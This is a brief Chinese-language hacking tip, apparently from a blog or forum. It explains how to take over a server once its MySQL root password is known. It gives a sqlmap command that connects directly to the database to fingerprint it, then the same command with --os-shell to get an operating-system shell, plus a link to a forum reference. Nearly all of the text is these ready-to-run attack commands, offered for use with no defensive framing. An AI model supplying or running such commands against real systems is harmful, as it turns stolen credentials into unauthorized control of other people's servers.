前提 已经获得了mysql数据库的账号密码,可结合sqlmap来获取系统权限 执行 sqlmap -d "mysql://root:密码@IP:3306/test" -f 打印数据库信息 其中test为数据库名,一般默认安装都有 更换参数获取系统权限 sqlmap -d "mysql://root:密码@IP:3306/test" --os-shell 参考文章 https://bbs.ichunqiu.com/thread-18254-1-5.html